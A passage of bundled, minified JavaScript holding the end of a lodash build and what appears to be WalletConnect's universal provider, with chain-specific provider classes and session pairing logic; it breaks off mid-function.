                N.prototype[n] = function(e) {
                    e = e === i ? 1 : Q(R(e), 0);
                    var r = this.__filtered__ && !t ? new N(this) : this.clone();
                    return r.__filtered__ ? r.__takeCount__ = nn(e, r.__takeCount__) : r.__views__.push({
                        size: nn(e, Hn),
                        type: n + (r.__dir__ < 0 ? "Right" : "")
                    }), r;
                }, N.prototype[n + "Right"] = function(e) {
                    return this.reverse()[n](e).reverse();
                };
            }), mn([
                "filter",
                "map",
                "takeWhile"
            ], function(n, t) {
                var e = t + 1, r = e == qi || e == $a;
                N.prototype[n] = function(s) {
                    var o = this.clone();
                    return o.__iteratees__.push({
                        iteratee: x(s, 3),
                        type: e
                    }), o.__filtered__ = o.__filtered__ || r, o;
                };
            }), mn([
                "head",
                "last"
            ], function(n, t) {
                var e = "take" + (t ? "Right" : "");
                N.prototype[n] = function() {
                    return this[e](1).value()[0];
                };
            }), mn([
                "initial",
                "tail"
            ], function(n, t) {
                var e = "drop" + (t ? "" : "Right");
                N.prototype[n] = function() {
                    return this.__filtered__ ? new N(this) : this[e](1);
                };
            }), N.prototype.compact = function() {
                return this.filter(fn);
            }, N.prototype.find = function(n) {
                return this.filter(n).head();
            }, N.prototype.findLast = function(n) {
                return this.reverse().find(n);
            }, N.prototype.invokeMap = T(function(n, t) {
                return typeof n == "function" ? new N(this) : this.map(function(e) {
                    return ue(e, n, t);
                });
            }), N.prototype.reject = function(n) {
                return this.filter(ir(x(n)));
            }, N.prototype.slice = function(n, t) {
                n = R(n);
                var e = this;
                return e.__filtered__ && (n > 0 || t < 0) ? new N(e) : (n < 0 ? e = e.takeRight(-n) : n && (e = e.drop(n)), t !== i && (t = R(t), e = t < 0 ? e.dropRight(-t) : e.take(t - n)), e);
            }, N.prototype.takeRightWhile = function(n) {
                return this.reverse().takeWhile(n).reverse();
            }, N.prototype.toArray = function() {
                return this.take(Hn);
            }, $n(N.prototype, function(n, t) {
                var e = /^(?:filter|find|map|reject)|While$/.test(t), r = /^(?:head|last)$/.test(t), s = a[r ? "take" + (t == "last" ? "Right" : "") : t], o = r || /^find/.test(t);
                s && (a.prototype[t] = function() {
                    var f = this.__wrapped__, c = r ? [
                        1
                    ] : arguments, l = f instanceof N, v = c[0], _ = l || O(f), m = function(L) {
                        var H = s.apply(a, nt([
                            L
                        ], c));
                        return r && w ? H[0] : H;
                    };
                    _ && e && typeof v == "function" && v.length != 1 && (l = _ = !1);
                    var w = this.__chain__, A = !!this.__actions__.length, E = o && !w, b = l && !A;
                    if (!o && _) {
                        f = b ? f : new N(this);
                        var y = n.apply(f, c);
                        return y.__actions__.push({
                            func: nr,
                            args: [
                                m
                            ],
                            thisArg: i
                        }), new Pn(y, w);
                    }
                    return E && b ? n.apply(this, c) : (y = this.thru(m), E ? r ? y.value()[0] : y.value() : y);
                });
            }), mn([
                "pop",
                "push",
                "shift",
                "sort",
                "splice",
                "unshift"
            ], function(n) {
                var t = ye[n], e = /^(?:push|sort|unshift)$/.test(n) ? "tap" : "thru", r = /^(?:pop|shift)$/.test(n);
                a.prototype[n] = function() {
                    var s = arguments;
                    if (r && !this.__chain__) {
                        var o = this.value();
                        return t.apply(O(o) ? o : [], s);
                    }
                    return this[e](function(f) {
                        return t.apply(O(f) ? f : [], s);
                    });
                };
            }), $n(N.prototype, function(n, t) {
                var e = a[t];
                if (e) {
                    var r = e.name + "";
                    W.call(Ht, r) || (Ht[r] = []), Ht[r].push({
                        name: t,
                        func: e
                    });
                }
            }), Ht[Ze(i, ft).name] = [
                {
                    name: "wrapper",
                    func: i
                }
            ], N.prototype.clone = qf, N.prototype.reverse = Bf, N.prototype.value = Gf, a.prototype.at = ml, a.prototype.chain = wl, a.prototype.commit = Pl, a.prototype.next = Al, a.prototype.plant = Il, a.prototype.reverse = xl, a.prototype.toJSON = a.prototype.valueOf = a.prototype.value = El, a.prototype.first = a.prototype.head, jt && (a.prototype[jt] = Cl), a;
        }, Lt = Pf();
        ht ? ((ht.exports = Lt)._ = Lt, br._ = Lt) : k._ = Lt;
    }).call($253fb4de41dc743b$var$pe);
})($253fb4de41dc743b$var$$i, $253fb4de41dc743b$var$$i.exports);
var $253fb4de41dc743b$var$Fg = Object.defineProperty, $253fb4de41dc743b$var$Mg = Object.defineProperties, $253fb4de41dc743b$var$qg = Object.getOwnPropertyDescriptors, $253fb4de41dc743b$var$xa = Object.getOwnPropertySymbols, $253fb4de41dc743b$var$Bg = Object.prototype.hasOwnProperty, $253fb4de41dc743b$var$Gg = Object.prototype.propertyIsEnumerable, $253fb4de41dc743b$var$Ea = (C, u, i)=>u in C ? $253fb4de41dc743b$var$Fg(C, u, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: i
    }) : C[u] = i, $253fb4de41dc743b$var$fr = (C, u)=>{
    for(var i in u || (u = {}))$253fb4de41dc743b$var$Bg.call(u, i) && $253fb4de41dc743b$var$Ea(C, i, u[i]);
    if ($253fb4de41dc743b$var$xa) for (var i of $253fb4de41dc743b$var$xa(u))$253fb4de41dc743b$var$Gg.call(u, i) && $253fb4de41dc743b$var$Ea(C, i, u[i]);
    return C;
}, $253fb4de41dc743b$var$zg = (C, u)=>$253fb4de41dc743b$var$Mg(C, $253fb4de41dc743b$var$qg(u));
function $253fb4de41dc743b$var$En(C, u, i) {
    let p;
    const I = $253fb4de41dc743b$var$Ui(C);
    return u.rpcMap && (p = u.rpcMap[I]), p || (p = `${$253fb4de41dc743b$var$Wg}?chainId=eip155:${I}&projectId=${i}`), p;
}
function $253fb4de41dc743b$var$Ui(C) {
    return C.includes("eip155") ? Number(C.split(":")[1]) : Number(C);
}
function $253fb4de41dc743b$var$ya(C) {
    return C.map((u)=>`${u.split(":")[0]}:${u.split(":")[1]}`);
}
function $253fb4de41dc743b$var$Kg(C, u) {
    const i = Object.keys(u.namespaces).filter((I)=>I.includes(C));
    if (!i.length) return [];
    const p = [];
    return i.forEach((I)=>{
        const D = u.namespaces[I].accounts;
        p.push(...D);
    }), p;
}
function $253fb4de41dc743b$var$Yg(C = {}, u = {}) {
    const i = $253fb4de41dc743b$var$Sa(C), p = $253fb4de41dc743b$var$Sa(u);
    return $253fb4de41dc743b$var$$i.exports.merge(i, p);
}
function $253fb4de41dc743b$var$Sa(C) {
    var u, i, p, I;
    const D = {};
    if (!(0, $a5d33cfc7f8e5437$export$16a0268bc22b47b0)(C)) return D;
    for (const [F, Fn] of Object.entries(C)){
        const Gt = (0, $a5d33cfc7f8e5437$export$e03e993df4723bde)(F) ? [
            F
        ] : Fn.chains, lr = Fn.methods || [], At = Fn.events || [], Ln = Fn.rpcMap || {}, Mn = (0, $a5d33cfc7f8e5437$export$dd404c96fbbb1ff8)(F);
        D[Mn] = $253fb4de41dc743b$var$zg($253fb4de41dc743b$var$fr($253fb4de41dc743b$var$fr({}, D[Mn]), Fn), {
            chains: (0, $a5d33cfc7f8e5437$export$9826fe7ad3921016)(Gt, (u = D[Mn]) == null ? void 0 : u.chains),
            methods: (0, $a5d33cfc7f8e5437$export$9826fe7ad3921016)(lr, (i = D[Mn]) == null ? void 0 : i.methods),
            events: (0, $a5d33cfc7f8e5437$export$9826fe7ad3921016)(At, (p = D[Mn]) == null ? void 0 : p.events),
            rpcMap: $253fb4de41dc743b$var$fr($253fb4de41dc743b$var$fr({}, Ln), (I = D[Mn]) == null ? void 0 : I.rpcMap)
        });
    }
    return D;
}
function $253fb4de41dc743b$var$Zg(C) {
    return C.includes(":") ? C.split(":")[2] : C;
}
function $253fb4de41dc743b$var$Jg(C) {
    const u = {};
    for (const [i, p] of Object.entries(C)){
        const I = p.methods || [], D = p.events || [], F = p.accounts || [], Fn = (0, $a5d33cfc7f8e5437$export$e03e993df4723bde)(i) ? [
            i
        ] : p.chains ? p.chains : $253fb4de41dc743b$var$ya(p.accounts);
        u[i] = {
            chains: Fn,
            methods: I,
            events: D,
            accounts: F
        };
    }
    return u;
}
const $253fb4de41dc743b$var$Oa = {}, $253fb4de41dc743b$var$J = (C)=>$253fb4de41dc743b$var$Oa[C], $253fb4de41dc743b$var$Wi = (C, u)=>{
    $253fb4de41dc743b$var$Oa[C] = u;
};
class $253fb4de41dc743b$var$Xg {
    constructor(u){
        this.name = "polkadot", this.namespace = u.namespace, this.events = $253fb4de41dc743b$var$J("events"), this.client = $253fb4de41dc743b$var$J("client"), this.chainId = this.getDefaultChain(), this.httpProviders = this.createHttpProviders();
    }
    updateNamespace(u) {
        this.namespace = Object.assign(this.namespace, u);
    }
    requestAccounts() {
        return this.getAccounts();
    }
    getDefaultChain() {
        if (this.chainId) return this.chainId;
        if (this.namespace.defaultChain) return this.namespace.defaultChain;
        const u = this.namespace.chains[0];
        if (!u) throw new Error("ChainId not found");
        return u.split(":")[1];
    }
    request(u) {
        return this.namespace.methods.includes(u.request.method) ? this.client.request(u) : this.getHttpProvider().request(u.request);
    }
    setDefaultChain(u, i) {
        if (this.chainId = u, !this.httpProviders[u]) {
            const p = i || $253fb4de41dc743b$var$En(`${this.name}:${u}`, this.namespace);
            if (!p) throw new Error(`No RPC url provided for chainId: ${u}`);
            this.setHttpProvider(u, p);
        }
        this.events.emit($253fb4de41dc743b$var$ot.DEFAULT_CHAIN_CHANGED, `${this.name}:${this.chainId}`);
    }
    getAccounts() {
        const u = this.namespace.accounts;
        return u ? u.filter((i)=>i.split(":")[1] === this.chainId.toString()).map((i)=>i.split(":")[2]) || [] : [];
    }
    createHttpProviders() {
        const u = {};
        return this.namespace.chains.forEach((i)=>{
            var p;
            u[i] = this.createHttpProvider(i, (p = this.namespace.rpcMap) == null ? void 0 : p[i]);
        }), u;
    }
    getHttpProvider() {
        const u = `${this.name}:${this.chainId}`, i = this.httpProviders[u];
        if (typeof i > "u") throw new Error(`JSON-RPC provider for ${u} not found`);
        return i;
    }
    setHttpProvider(u, i) {
        const p = this.createHttpProvider(u, i);
        p && (this.httpProviders[u] = p);
    }
    createHttpProvider(u, i) {
        const p = i || $253fb4de41dc743b$var$En(u, this.namespace);
        return typeof p > "u" ? void 0 : new (0, $1582203255a670cd$export$da28308012bf6748)(new (0, $9fa154a0253fc04e$export$2e2bcd8739ae039)(p, $253fb4de41dc743b$var$J("disableProviderPing")));
    }
}
class $253fb4de41dc743b$var$Qg {
    constructor(u){
        this.name = "eip155", this.namespace = u.namespace, this.events = $253fb4de41dc743b$var$J("events"), this.client = $253fb4de41dc743b$var$J("client"), this.httpProviders = this.createHttpProviders(), this.chainId = parseInt(this.getDefaultChain());
    }
    async request(u) {
        switch(u.request.method){
            case "eth_requestAccounts":
                return this.getAccounts();
            case "eth_accounts":
                return this.getAccounts();
            case "wallet_switchEthereumChain":
                return await this.handleSwitchChain(u);
            case "eth_chainId":
                return parseInt(this.getDefaultChain());
        }
        return this.namespace.methods.includes(u.request.method) ? await this.client.request(u) : this.getHttpProvider().request(u.request);
    }
    updateNamespace(u) {
        this.namespace = Object.assign(this.namespace, u);
    }
    setDefaultChain(u, i) {
        const p = $253fb4de41dc743b$var$Ui(u);
        if (!this.httpProviders[p]) {
            const I = i || $253fb4de41dc743b$var$En(`${this.name}:${p}`, this.namespace, this.client.core.projectId);
            if (!I) throw new Error(`No RPC url provided for chainId: ${p}`);
            this.setHttpProvider(p, I);
        }
        this.chainId = p, this.events.emit($253fb4de41dc743b$var$ot.DEFAULT_CHAIN_CHANGED, `${this.name}:${p}`);
    }
    requestAccounts() {
        return this.getAccounts();
    }
    getDefaultChain() {
        if (this.chainId) return this.chainId.toString();
        if (this.namespace.defaultChain) return this.namespace.defaultChain;
        const u = this.namespace.chains[0];
        if (!u) throw new Error("ChainId not found");
        return u.split(":")[1];
    }
    createHttpProvider(u, i) {
        const p = i || $253fb4de41dc743b$var$En(`${this.name}:${u}`, this.namespace, this.client.core.projectId);
        return typeof p > "u" ? void 0 : new (0, $1582203255a670cd$export$da28308012bf6748)(new (0, $da1642b2b5d2a2fb$export$13c1f9cf8a283575)(p, $253fb4de41dc743b$var$J("disableProviderPing")));
    }
    setHttpProvider(u, i) {
        const p = this.createHttpProvider(u, i);
        p && (this.httpProviders[u] = p);
    }
    createHttpProviders() {
        const u = {};
        return this.namespace.chains.forEach((i)=>{
            var p;
            const I = $253fb4de41dc743b$var$Ui(i);
            u[I] = this.createHttpProvider(I, (p = this.namespace.rpcMap) == null ? void 0 : p[i]);
        }), u;
    }
    getAccounts() {
        const u = this.namespace.accounts;
        return u ? [
            ...new Set(u.filter((i)=>i.split(":")[1] === this.chainId.toString()).map((i)=>i.split(":")[2]))
        ] : [];
    }
    getHttpProvider() {
        const u = this.chainId, i = this.httpProviders[u];
        if (typeof i > "u") throw new Error(`JSON-RPC provider for ${u} not found`);
        return i;
    }
    async handleSwitchChain(u) {
        var i, p;
        let I = u.request.params ? (i = u.request.params[0]) == null ? void 0 : i.chainId : "0x0";
        I = I.startsWith("0x") ? I : `0x${I}`;
        const D = parseInt(I, 16);
        if (this.isChainApproved(D)) this.setDefaultChain(`${D}`);
        else if (this.namespace.methods.includes("wallet_switchEthereumChain")) await this.client.request({
            topic: u.topic,
            request: {
                method: u.request.method,
                params: [
                    {
                        chainId: I
                    }
                ]
            },
            chainId: (p = this.namespace.chains) == null ? void 0 : p[0]
        }), this.setDefaultChain(`${D}`);
        else throw new Error(`Failed to switch to chain 'eip155:${D}'. The chain is not approved or the wallet does not support 'wallet_switchEthereumChain' method.`);
        return null;
    }
    isChainApproved(u) {
        return this.namespace.chains.includes(`${this.name}:${u}`);
    }
}
class $253fb4de41dc743b$var$Vg {
    constructor(u){
        this.name = "solana", this.namespace = u.namespace, this.events = $253fb4de41dc743b$var$J("events"), this.client = $253fb4de41dc743b$var$J("client"), this.chainId = this.getDefaultChain(), this.httpProviders = this.createHttpProviders();
    }
    updateNamespace(u) {
        this.namespace = Object.assign(this.namespace, u);
    }
    requestAccounts() {
        return this.getAccounts();
    }
    request(u) {
        return this.namespace.methods.includes(u.request.method) ? this.client.request(u) : this.getHttpProvider().request(u.request);
    }
    setDefaultChain(u, i) {
        if (!this.httpProviders[u]) {
            const p = i || $253fb4de41dc743b$var$En(`${this.name}:${u}`, this.namespace, this.client.core.projectId);
            if (!p) throw new Error(`No RPC url provided for chainId: ${u}`);
            this.setHttpProvider(u, p);
        }
        this.chainId = u, this.events.emit($253fb4de41dc743b$var$ot.DEFAULT_CHAIN_CHANGED, `${this.name}:${this.chainId}`);
    }
    getDefaultChain() {
        if (this.chainId) return this.chainId;
        if (this.namespace.defaultChain) return this.namespace.defaultChain;
        const u = this.namespace.chains[0];
        if (!u) throw new Error("ChainId not found");
        return u.split(":")[1];
    }
    getAccounts() {
        const u = this.namespace.accounts;
        return u ? [
            ...new Set(u.filter((i)=>i.split(":")[1] === this.chainId.toString()).map((i)=>i.split(":")[2]))
        ] : [];
    }
    createHttpProviders() {
        const u = {};
        return this.namespace.chains.forEach((i)=>{
            var p;
            u[i] = this.createHttpProvider(i, (p = this.namespace.rpcMap) == null ? void 0 : p[i]);
        }), u;
    }
    getHttpProvider() {
        const u = `${this.name}:${this.chainId}`, i = this.httpProviders[u];
        if (typeof i > "u") throw new Error(`JSON-RPC provider for ${u} not found`);
        return i;
    }
    setHttpProvider(u, i) {
        const p = this.createHttpProvider(u, i);
        p && (this.httpProviders[u] = p);
    }
    createHttpProvider(u, i) {
        const p = i || $253fb4de41dc743b$var$En(u, this.namespace, this.client.core.projectId);
        return typeof p > "u" ? void 0 : new (0, $1582203255a670cd$export$da28308012bf6748)(new (0, $9fa154a0253fc04e$export$2e2bcd8739ae039)(p, $253fb4de41dc743b$var$J("disableProviderPing")));
    }
}
class $253fb4de41dc743b$var$kg {
    constructor(u){
        this.name = "cosmos", this.namespace = u.namespace, this.events = $253fb4de41dc743b$var$J("events"), this.client = $253fb4de41dc743b$var$J("client"), this.chainId = this.getDefaultChain(), this.httpProviders = this.createHttpProviders();
    }
    updateNamespace(u) {
        this.namespace = Object.assign(this.namespace, u);
    }
    requestAccounts() {
        return this.getAccounts();
    }
    getDefaultChain() {
        if (this.chainId) return this.chainId;
        if (this.namespace.defaultChain) return this.namespace.defaultChain;
        const u = this.namespace.chains[0];
        if (!u) throw new Error("ChainId not found");
        return u.split(":")[1];
    }
    request(u) {
        return this.namespace.methods.includes(u.request.method) ? this.client.request(u) : this.getHttpProvider().request(u.request);
    }
    setDefaultChain(u, i) {
        if (this.chainId = u, !this.httpProviders[u]) {
            const p = i || $253fb4de41dc743b$var$En(`${this.name}:${u}`, this.namespace, this.client.core.projectId);
            if (!p) throw new Error(`No RPC url provided for chainId: ${u}`);
            this.setHttpProvider(u, p);
        }
        this.events.emit($253fb4de41dc743b$var$ot.DEFAULT_CHAIN_CHANGED, `${this.name}:${this.chainId}`);
    }
    getAccounts() {
        const u = this.namespace.accounts;
        return u ? [
            ...new Set(u.filter((i)=>i.split(":")[1] === this.chainId.toString()).map((i)=>i.split(":")[2]))
        ] : [];
    }
    createHttpProviders() {
        const u = {};
        return this.namespace.chains.forEach((i)=>{
            var p;
            u[i] = this.createHttpProvider(i, (p = this.namespace.rpcMap) == null ? void 0 : p[i]);
        }), u;
    }
    getHttpProvider() {
        const u = `${this.name}:${this.chainId}`, i = this.httpProviders[u];
        if (typeof i > "u") throw new Error(`JSON-RPC provider for ${u} not found`);
        return i;
    }
    setHttpProvider(u, i) {
        const p = this.createHttpProvider(u, i);
        p && (this.httpProviders[u] = p);
    }
    createHttpProvider(u, i) {
        const p = i || $253fb4de41dc743b$var$En(u, this.namespace, this.client.core.projectId);
        return typeof p > "u" ? void 0 : new (0, $1582203255a670cd$export$da28308012bf6748)(new (0, $9fa154a0253fc04e$export$2e2bcd8739ae039)(p, $253fb4de41dc743b$var$J("disableProviderPing")));
    }
}
class $253fb4de41dc743b$var$jg {
    constructor(u){
        this.name = "cip34", this.namespace = u.namespace, this.events = $253fb4de41dc743b$var$J("events"), this.client = $253fb4de41dc743b$var$J("client"), this.chainId = this.getDefaultChain(), this.httpProviders = this.createHttpProviders();
    }
    updateNamespace(u) {
        this.namespace = Object.assign(this.namespace, u);
    }
    requestAccounts() {
        return this.getAccounts();
    }
    getDefaultChain() {
        if (this.chainId) return this.chainId;
        if (this.namespace.defaultChain) return this.namespace.defaultChain;
        const u = this.namespace.chains[0];
        if (!u) throw new Error("ChainId not found");
        return u.split(":")[1];
    }
    request(u) {
        return this.namespace.methods.includes(u.request.method) ? this.client.request(u) : this.getHttpProvider().request(u.request);
    }
    setDefaultChain(u, i) {
        if (this.chainId = u, !this.httpProviders[u]) {
            const p = i || this.getCardanoRPCUrl(u);
            if (!p) throw new Error(`No RPC url provided for chainId: ${u}`);
            this.setHttpProvider(u, p);
        }
        this.events.emit($253fb4de41dc743b$var$ot.DEFAULT_CHAIN_CHANGED, `${this.name}:${this.chainId}`);
    }
    getAccounts() {
        const u = this.namespace.accounts;
        return u ? [
            ...new Set(u.filter((i)=>i.split(":")[1] === this.chainId.toString()).map((i)=>i.split(":")[2]))
        ] : [];
    }
    createHttpProviders() {
        const u = {};
        return this.namespace.chains.forEach((i)=>{
            const p = this.getCardanoRPCUrl(i);
            u[i] = this.createHttpProvider(i, p);
        }), u;
    }
    getHttpProvider() {
        const u = `${this.name}:${this.chainId}`, i = this.httpProviders[u];
        if (typeof i > "u") throw new Error(`JSON-RPC provider for ${u} not found`);
        return i;
    }
    getCardanoRPCUrl(u) {
        const i = this.namespace.rpcMap;
        if (i) return i[u];
    }
    setHttpProvider(u, i) {
        const p = this.createHttpProvider(u, i);
        p && (this.httpProviders[u] = p);
    }
    createHttpProvider(u, i) {
        const p = i || this.getCardanoRPCUrl(u);
        return typeof p > "u" ? void 0 : new (0, $1582203255a670cd$export$da28308012bf6748)(new (0, $9fa154a0253fc04e$export$2e2bcd8739ae039)(p, $253fb4de41dc743b$var$J("disableProviderPing")));
    }
}
class $253fb4de41dc743b$var$nv {
    constructor(u){
        this.name = "elrond", this.namespace = u.namespace, this.events = $253fb4de41dc743b$var$J("events"), this.client = $253fb4de41dc743b$var$J("client"), this.chainId = this.getDefaultChain(), this.httpProviders = this.createHttpProviders();
    }
    updateNamespace(u) {
        this.namespace = Object.assign(this.namespace, u);
    }
    requestAccounts() {
        return this.getAccounts();
    }
    request(u) {
        return this.namespace.methods.includes(u.request.method) ? this.client.request(u) : this.getHttpProvider().request(u.request);
    }
    setDefaultChain(u, i) {
        if (!this.httpProviders[u]) {
            const p = i || $253fb4de41dc743b$var$En(`${this.name}:${u}`, this.namespace, this.client.core.projectId);
            if (!p) throw new Error(`No RPC url provided for chainId: ${u}`);
            this.setHttpProvider(u, p);
        }
        this.chainId = u, this.events.emit($253fb4de41dc743b$var$ot.DEFAULT_CHAIN_CHANGED, `${this.name}:${this.chainId}`);
    }
    getDefaultChain() {
        if (this.chainId) return this.chainId;
        if (this.namespace.defaultChain) return this.namespace.defaultChain;
        const u = this.namespace.chains[0];
        if (!u) throw new Error("ChainId not found");
        return u.split(":")[1];
    }
    getAccounts() {
        const u = this.namespace.accounts;
        return u ? [
            ...new Set(u.filter((i)=>i.split(":")[1] === this.chainId.toString()).map((i)=>i.split(":")[2]))
        ] : [];
    }
    createHttpProviders() {
        const u = {};
        return this.namespace.chains.forEach((i)=>{
            var p;
            u[i] = this.createHttpProvider(i, (p = this.namespace.rpcMap) == null ? void 0 : p[i]);
        }), u;
    }
    getHttpProvider() {
        const u = `${this.name}:${this.chainId}`, i = this.httpProviders[u];
        if (typeof i > "u") throw new Error(`JSON-RPC provider for ${u} not found`);
        return i;
    }
    setHttpProvider(u, i) {
        const p = this.createHttpProvider(u, i);
        p && (this.httpProviders[u] = p);
    }
    createHttpProvider(u, i) {
        const p = i || $253fb4de41dc743b$var$En(u, this.namespace, this.client.core.projectId);
        return typeof p > "u" ? void 0 : new (0, $1582203255a670cd$export$da28308012bf6748)(new (0, $9fa154a0253fc04e$export$2e2bcd8739ae039)(p, $253fb4de41dc743b$var$J("disableProviderPing")));
    }
}
class $253fb4de41dc743b$var$tv {
    constructor(u){
        this.name = "multiversx", this.namespace = u.namespace, this.events = $253fb4de41dc743b$var$J("events"), this.client = $253fb4de41dc743b$var$J("client"), this.chainId = this.getDefaultChain(), this.httpProviders = this.createHttpProviders();
    }
    updateNamespace(u) {
        this.namespace = Object.assign(this.namespace, u);
    }
    requestAccounts() {
        return this.getAccounts();
    }
    request(u) {
        return this.namespace.methods.includes(u.request.method) ? this.client.request(u) : this.getHttpProvider().request(u.request);
    }
    setDefaultChain(u, i) {
        if (!this.httpProviders[u]) {
            const p = i || $253fb4de41dc743b$var$En(`${this.name}:${u}`, this.namespace, this.client.core.projectId);
            if (!p) throw new Error(`No RPC url provided for chainId: ${u}`);
            this.setHttpProvider(u, p);
        }
        this.chainId = u, this.events.emit($253fb4de41dc743b$var$ot.DEFAULT_CHAIN_CHANGED, `${this.name}:${this.chainId}`);
    }
    getDefaultChain() {
        if (this.chainId) return this.chainId;
        if (this.namespace.defaultChain) return this.namespace.defaultChain;
        const u = this.namespace.chains[0];
        if (!u) throw new Error("ChainId not found");
        return u.split(":")[1];
    }
    getAccounts() {
        const u = this.namespace.accounts;
        return u ? [
            ...new Set(u.filter((i)=>i.split(":")[1] === this.chainId.toString()).map((i)=>i.split(":")[2]))
        ] : [];
    }
    createHttpProviders() {
        const u = {};
        return this.namespace.chains.forEach((i)=>{
            var p;
            u[i] = this.createHttpProvider(i, (p = this.namespace.rpcMap) == null ? void 0 : p[i]);
        }), u;
    }
    getHttpProvider() {
        const u = `${this.name}:${this.chainId}`, i = this.httpProviders[u];
        if (typeof i > "u") throw new Error(`JSON-RPC provider for ${u} not found`);
        return i;
    }
    setHttpProvider(u, i) {
        const p = this.createHttpProvider(u, i);
        p && (this.httpProviders[u] = p);
    }
    createHttpProvider(u, i) {
        const p = i || $253fb4de41dc743b$var$En(u, this.namespace, this.client.core.projectId);
        return typeof p > "u" ? void 0 : new (0, $1582203255a670cd$export$da28308012bf6748)(new (0, $9fa154a0253fc04e$export$2e2bcd8739ae039)(p, $253fb4de41dc743b$var$J("disableProviderPing")));
    }
}
var $253fb4de41dc743b$var$ev = Object.defineProperty, $253fb4de41dc743b$var$rv = Object.defineProperties, $253fb4de41dc743b$var$iv = Object.getOwnPropertyDescriptors, $253fb4de41dc743b$var$Ra = Object.getOwnPropertySymbols, $253fb4de41dc743b$var$sv = Object.prototype.hasOwnProperty, $253fb4de41dc743b$var$uv = Object.prototype.propertyIsEnumerable, $253fb4de41dc743b$var$ba = (C, u, i)=>u in C ? $253fb4de41dc743b$var$ev(C, u, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: i
    }) : C[u] = i, $253fb4de41dc743b$var$cr = (C, u)=>{
    for(var i in u || (u = {}))$253fb4de41dc743b$var$sv.call(u, i) && $253fb4de41dc743b$var$ba(C, i, u[i]);
    if ($253fb4de41dc743b$var$Ra) for (var i of $253fb4de41dc743b$var$Ra(u))$253fb4de41dc743b$var$uv.call(u, i) && $253fb4de41dc743b$var$ba(C, i, u[i]);
    return C;
}, $253fb4de41dc743b$var$Fi = (C, u)=>$253fb4de41dc743b$var$rv(C, $253fb4de41dc743b$var$iv(u));
class $253fb4de41dc743b$export$2e2bcd8739ae039 {
    constructor(u){
        this.events = new (0, (/*@__PURE__*/$parcel$interopDefault($7etJZ))), this.rpcProviders = {}, this.shouldAbortPairingAttempt = !1, this.maxPairingAttempts = 10, this.disableProviderPing = !1, this.providerOpts = u, this.logger = typeof u?.logger < "u" && typeof u?.logger != "string" ? u.logger : (0, $7fc0ce2591a9daef$exports.pino)((0, $7fc0ce2591a9daef$exports.getDefaultLoggerOptions)({
            level: u?.logger || $253fb4de41dc743b$var$Ca
        })), this.disableProviderPing = u?.disableProviderPing || !1;
    }
    static async init(u) {
        const i = new $253fb4de41dc743b$export$2e2bcd8739ae039(u);
        return await i.initialize(), i;
    }
    async request(u, i) {
        const [p, I] = this.validateChain(i);
        if (!this.session) throw new Error("Please call connect() before request()");
        return await this.getProvider(p).request({
            request: $253fb4de41dc743b$var$cr({}, u),
            chainId: `${p}:${I}`,
            topic: this.session.topic
        });
    }
    sendAsync(u, i, p) {
        this.request(u, p).then((I)=>i(null, I)).catch((I)=>i(I, void 0));
    }
    async enable() {
        if (!this.client) throw new Error("Sign Client not initialized");
        return this.session || await this.connect({
            namespaces: this.namespaces,
            optionalNamespaces: this.optionalNamespaces,
            sessionProperties: this.sessionProperties
        }), await this.requestAccounts();
    }
    async disconnect() {
        var u;
        if (!this.session) throw new Error("Please call connect() before enable()");
        await this.client.disconnect({
            topic: (u = this.session) == null ? void 0 : u.topic,
            reason: (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")
        }), await this.cleanup();
    }
    async connect(u) {
        if (!this.client) throw new Error("Sign Client not initialized");
        if (this.setNamespaces(u), await this.cleanupPendingPairings(), !u.skipPairing) return await this.pair(u.pairingTopic);
    }
    on(u, i) {
        this.events.on(u, i);
    }
    once(u, i) {
        this.events.once(u, i);
    }
    removeListener(u, i) {
        this.events.removeListener(u, i);
    }
    off(u, i) {
        this.events.off(u, i);
    }
    get isWalletConnect() {
        return !0;
    }
    async pair(u) {
        this.shouldAbortPairingAttempt = !1;
        let i = 0;
        do {
            if (this.shouldAbortPairingAttempt) throw new Error("Pairing aborted");
            if (i >= this.maxPairingAttempts) throw new Error("Max auto pairing attempts reached");
            const { uri: p, approval: I } = await this.client.connect({
                pairingTopic: u,
                requiredNamespaces: this.namespaces,
                optionalNamespaces: this.optionalNamespaces,
                sessionProperties: this.sessionProperties
            });
            p && (this.uri = p, this.events.emit("display_uri", p)), await I().then((D)=>{
                this.session = D, this.namespaces || (this.namespaces = $253fb4de41dc743b$var$Jg(D.namespaces), this.persist("namespaces", this.namespaces));
            }).catch((D)=>{
                if (D.message !== (0, $4a472e843fedf2e2$export$1e6a4dc5172f4830)) throw D;
                i++;
            });
        }while (!this.session);
        return this.onConnect(), this.session;
    }
    setDefaultChain(u, i) {
        try {
            if (!this.session) return;
            const [p, I] = this.validateChain(u);
            this.getProvider(p).setDefaultChain(I, i);
        } catch (p) {
            if (!/Please call connect/.test(p.message)) throw p;
        }
    }
    async cleanupPendingPairings(u = {}) {
        this.logger.info("Cleaning up inactive pairings...");
        const i = this.client.pairing.getAll();
        if ((0, $a5d33cfc7f8e5437$export$41dd3d480aac4a71)(i)) {
            for (const p of i)u.deletePairings ? this.client.core.expirer.set(p.topic, 0) : await this.client.core.relayer.subscriber.unsubscribe(p.topic);
            this.logger.info(`Inactive pairings cleared: ${i.length}`);
        }
    }
    abortPairingAttempt() {
        this.shouldAbortPairingAttempt = !0;
    }
    async checkStorage() {
        if (this.namespaces = await this.getFromStore("namespaces"), this.optionalNamespaces = await this.getFromStore("optionalNamespaces") || {}, this.client.session.length) {
            const u = this.client.session.keys.length - 1;
            this.session = this.client.session.get(this.client.session.keys[u]), this.createProviders();
        }
    }
    async initialize() {
        this.logger.trace("Initialized"), await this.createClient(), await this.checkStorage(), this.registerEventListeners();
    }
    async createClient() {
        this.client = this.providerOpts.client || await (0, $4a472e843fedf2e2$export$2e2bcd8739ae039).init({
            logger: this.providerOpts.logger || $253fb4de41dc743b$var$Ca,
            relayUrl: this.providerOpts.relayUrl || $253fb4de41dc743b$var$Hg,
            projectId: this.providerOpts.projectId,
            metadata: this.providerOpts.metadata,
            storageOptions: this.providerOpts.storageOptions,
            storage: this.providerOpts.storage,
            name: this.providerOpts.name
        }), this.logger.trace("SignClient Initialized");
    }
    createProviders() {
        if (!this.client) throw new Error("Sign Client not initialized");
        if (!this.session) throw new Error("Session not initialized. Please call connect() before enable()");
        const u = [
